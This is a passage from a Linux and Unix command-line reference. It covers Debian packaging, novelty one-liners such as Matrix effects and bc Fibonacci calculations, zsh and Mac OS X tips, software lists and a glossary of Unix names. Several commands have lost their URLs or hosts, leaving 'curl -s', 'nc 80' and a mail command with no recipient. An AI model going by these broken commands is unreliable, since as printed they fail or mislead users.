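Description: parses a text stream
 This script parses a text stream using a stack virtual machine
EOF

# lay out the package tree
mkdir -p debian/usr/bin debian/DEBIAN
cp "$PKG" debian/usr/bin
chmod 755 "debian/usr/bin/$PKG"
cp control debian/DEBIAN
find debian -type d -exec chmod 755 {} +

# build and rename the package, if dpkg-deb is available
if command -v dpkg-deb >/dev/null; then
    dpkg-deb --build debian && mv debian.deb "${PKG}_${VER}_all.deb" || true
fi
```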


Unix Program Naming ‹↑›

The names for Unix programs appear cryptic and seem to have no relation to their function. However there is usually an explanation for the name. Unix commands are traditionally very short to save typing.


Curiosities ‹↑›

A dead cow thinking about your fortune cookie

 fortune -s -c -a | cowthink -d -W 45

Find the cover image for an album

 albumart(){ local y="$@";awk '/View larger image/{gsub(/^.*largeImagePopup\(.|., .*$/,"");print;exit}' <(curl -s ''${y// /+}'&itempage=1&newsearch=1&searchindex=Music');}

random xkcd comic

 display "$(wget -q -O - | grep -Po '(?<=")[^"]+(png|jpg)')"

Auto Rotate Cube (compiz)

 wmctrl -o 2560,0 ;sleep 2 ; echo "FIRE 001" | osd_cat -o 470 -s 8 -c red -d 10 -f -*-bitstream\ vera\ sans-*-*-*--250-*-*-*-*-*-*-* ; sleep 1; wmctrl -o 0,0

Matrix Style

 LC_ALL=C tr -c "[:digit:]" " " < /dev/urandom | dd cbs=$COLUMNS conv=unblock | GREP_COLOR="1;32" grep --color "[^ ]"

read the useless use of cat awards page


dolphins on the desktop (compiz)

 xwinwrap -ni -argb -fs -s -st -sp -nf -b -- /usr/libexec/xscreensaver/atlantis -count 20 -window-id WID &

for all who don't have the watch command

 watch() { while test :; do clear; date=$(date); echo -e "Every "$1"s: $2 \t\t\t\t $date"; $2; sleep $1; done }

Get Futurama quotations from servers

 echo -e "HEAD / HTTP/1.1\nHost:\n\n" | nc 80 | egrep "Bender|Fry" | sed "s/X-//"

View the newest xkcd comic.

 xkcd(){ local f=$(curl -s;display $(echo "$f"|grep -Po '(?<=")[^"]+(png|jpg)');echo "$f"|awk '/<img src="http:\/\/imgs\.xkcd\.com\/comics\/.*?" title=.*/{gsub(/^.*title=.|".*?$/,"");print}';}

The absolutely fastest nth fibonacci number

 time echo 'n=70332;m=(n+1)/2;a=0;b=1;i=0;while(m){e[i++]=m%2;m/=2};while(i--){c=a*a;a=c+2*a*b;b=c+b*b;if(e[i]){t=a;a+=b;b=t}};if(n%2)a*a+b*b;if(!n%2)a*(a+2*b)' | bc

The 1 millionth fibonacci number

 time echo 'n=1000000;m=(n+1)/2;a=0;b=1;i=0;while(m){e[i++]=m%2;m/=2};while(i--){c=a*a;a=c+2*a*b;b=c+b*b;if(e[i]){t=a;a+=b;b=t}};if(n%2)a*a+b*b;if(!n%2)a*(a+2*b)' | bc
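
The one-liners above walk the bits of n using the fast-doubling method. A small, checkable instance wrapped in a function (assumes 'bc' is installed; F(10) is 55 and F(11) is 89):

```shell
# fast-doubling fibonacci via bc; fib N prints the Nth fibonacci number
fib() {
    echo "n=$1;m=(n+1)/2;a=0;b=1;i=0;while(m){e[i++]=m%2;m/=2};while(i--){c=a*a;a=c+2*a*b;b=c+b*b;if(e[i]){t=a;a+=b;b=t}};if(n%2)a*a+b*b;if(!n%2)a*(a+2*b)" | bc
}
if command -v bc >/dev/null; then
    fib 10    # -> 55
    fib 11    # -> 89
fi
```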

Another Matrix Style Implementation

 echo -ne "\e[32m" ; while true ; do echo -ne "\e[$(($RANDOM % 2 + 1))m" ; tr -c "[:print:]" " " < /dev/urandom | dd count=1 bs=50 2> /dev/null ; done

useless load

 cat /dev/urandom | gzip -9 > /dev/null &

Gets a random Futurama quote from /.

 curl -Is | egrep '^X-(F|B|L)' | cut -d \- -f 2

Get Futurama quotations from servers

 lynx -head -dump|egrep 'Bender|Fry'|sed 's/X-//'

put nothing nowhere

 cat /dev/zero > /dev/null &

Random line from (funny IRC quotes)

 curl -s

decode html entities with perl

 perl -ne 'use HTML::Entities;print decode_entities($_),"\n"'

Zsh ‹↑›

Get the length of an array in zsh

 a=(1 2 3); echo $#a

List the top ten commands you use for the 'zsh' shell

 perl -pe 's/.+;//' ~/.zsh_history | sort | uniq -c | sort -r|head -10

ZSH prompt: shows ':)' after a program exits with no error, ':(' after an error

 PROMPT=$'%{\e[0;32m%}%B[%b%{\e[0m%}%n%{\e[0;32m%}@%{\e[0m%}%(4c,./%1~,% ~)%{\e[0;32m%}%B]%b% %(?,%{\e[0;32m%}:%)%{\e[0m%},%{\e[0;31m%}:(%{\e[0m%}) %# '

Show every subdirectory (zsh)

 ls -ld **/*(/)

Delete empty directories with zsh

 rm -d **/*(/^F)

Postpone a command [zsh]


zsh only: access a file when you don't know the path, if it is in your $PATH (the '=' prefix expands a command name to its full path)

 file =top
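
The '(/)' suffix in the recipes above is a zsh 'glob qualifier', a filter appended to a glob pattern. A few more examples of the same mechanism, run through 'zsh -c' and skipped entirely if zsh is not installed:

```shell
if command -v zsh >/dev/null; then
    # a small directory tree to match against
    mkdir -p demo/sub && touch demo/a.txt
    zsh -c 'print -l demo/*(/)'           # (/) matches directories only: demo/sub
    zsh -c 'print -l demo/*(.)'           # (.) matches plain files only: demo/a.txt
    zsh -c 'a=(one two three); echo $#a'  # array length: 3
fi
```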

Mac Osx ‹↑›

This book focuses more on Linux, but here is a little information about OSX.

Enable Hibernate in OS X

 sudo pmset -a hibernatemode 1

On Mac OS X, run a System Profiler report and e-mail it to a recipient

 system_profiler | mail -s "$HOSTNAME System Profiler Report"

Paste OS X clipboard contents to a file on a remote machine

 pbpaste | ssh user@hostname 'cat > ~/my_new_file.txt'

Throttling Bandwidth On A Mac

 sudo ipfw pipe 1 config bw 50KByte/s;sudo ipfw add 1 pipe 1 src-port 80

OSX command to take badly formatted xml from the clipboard, clean it up, and put it back on the clipboard

 pbpaste | tidy -xml -wrap 0 | pbcopy

Paste the contents of OS X clipboard into a new text file

 pbpaste > newfile.txt

Zip a directory on Mac OS X and ignore .DS_Store (meta-data)

 zip -vr example/ -x "*.DS_Store"

Open up a man page as PDF (#OSX)

 function man2pdf(){ man -t ${1:?Specify man as arg} | open -f -a Preview; }

a good macosx command line site
on a bsd system view information about the folder structure
 man hier

Newsreaders ‹↑›

www: slrn
www: pan
graphical, good
www: gnus
within emacs
www: thunderbird
www: xpn
www: knode
the kde app

File Usage ‹↑›

www: filelight
shows disk usage in a graphical manner
www: gadmin-rsync
a gui wrapper for rsync with ssh, scp etc

Terminals ‹↑›

www: slugterm
light weight terminal for small linuxes
remote desktop for sys admins

Graphs ‹↑›

A simple pie chart in 'gnuplot' (and with a 3d thickness)

mind mapping charting software

Wiki ‹↑›

www: dokuwiki
a wiki with no database backend

Music ‹↑›

www: amarok
www: songbird
music playlist software
www: frescobaldi
create musical scores from a text input file. gui application

Gps ‹↑›

www: gpx
an xml format for storing gps data
www: prune
a tool for manipulating gps data

Art ‹↑›

www: synfig studio
a program to create animations using stick figures, paths etc.
www: blender
3d animations
a tool for creating traditional drawn animation
an open source animation (anime)

Games ‹↑›

www: childsplay
educational games: a spelling pacman, flashcards, etc.
www: pyspacewar
an asteroid shoot-em-up

Game Engines ‹↑›

www: pygame
www: sdl
an open source game engine, written in c++, with bindings for other languages

Genealogy ‹↑›

www: gramps
a gui genealogy builder

Blog Engines ‹↑›

www: bilboblog
a simple blog engine
www: lifeograph
simple diary application

Jargon ‹↑›

www: easter egg
an unexpected function hidden in a piece of software
www: Unix-style operating system
an operating system which is somewhat 'unix-like'; examples include Apple OSX, Linux, and FreeBSD
www: Linux flavour, Linux distribution
Linux comes in a number of different distributions, such as Debian, Fedora, and Ubuntu, to name only a few.
www: regular expression
a search pattern
www: recursive
Recursive means to do an action for some object, and then repeat the same action for all objects which that object contains.
www: concatenate
join together two or more things. For example join together 2 files with 'cat a.txt b.txt > c.txt'
www: command
www: shell
A shell is a piece of software which allows you to communicate with the computer by typing (rather cryptic) commands, and watching the output of those commands. This book focusses on the 'Bash' shell, which is probably the most popular shell on Unix, Linux and Apple OsX.
www: terminal
The terminal is a piece of software which allows you to use the 'shell'. Examples are 'Konsole' for KDE
www: program
A program is really just a piece of software which does something on the computer.
www: parse, parsing
parsing is the process of analysing a piece of text and splitting it into its structural parts. This is a very important task on all computer systems, since a great deal of data processing involves parsing one text format and then transforming it into another.
www: thread
a lightweight unit of execution within a process
www: daemon
a program which runs in the background, usually providing a service
www: process
a running instance of a program
These are similar but distinct and important concepts
Some Unix names explained
unix a pun on the <mul>tics operating system
linux <linu>s torvalds version of the uni<x> operating system
cat con<cat>enate files, display all mentioned files
less is a successor to the 'more' program, a file pager
sed <s>tream <ed>itor
grep <g>lobal <r>egular <e>x<p>ression search,
ed <ed>itor
vi <vi>sual editor
vim <v>isual editor <im>proved
emacs <e>diting <mac>ro<s>
wc <w>ord <c>ount
tar write to a <t>ape <ar>chive
ls <l>i<s>t files,
troff <t>ypesetting <r>un <off> system, formats documents
groff <g>nu version of the <r>un <off> system
perl <p>ractical <e>xtraction and <r>eporting <l>anguage
awk text processing language by <A>ho, <W>einberger, and <K>ernighan
cd <c>hange <d>irectory
gcc <g>nu <c> <c>ompiler
wget <w>eb <get>ter
curl <c>lient for <url>s
scp <s>ecure <c>opy <p>rogram
www: pretty-print
This refers to the process of preparing some piece of text automatically in some way which is pleasing to read once printed on a piece of paper or on a computer screen. The term is ambiguous since it can refer to the application of colour to a text file or to the changing and formatting of indentation and paragraph width

Notes And Ideas ‹↑›

This section contains references to things which I think would be worthwhile investigating, but which I haven't, and may well never, get round to doing.

grsync. gimp thresholds. seahorse for encryption

vnc and vino for remote control Tweetdeck, bluefish, dropbox, dialog, gdialog,

xxd - hexdumps


Organisation ‹↑›

printing jargon


zim - note taker
tomboy - note taker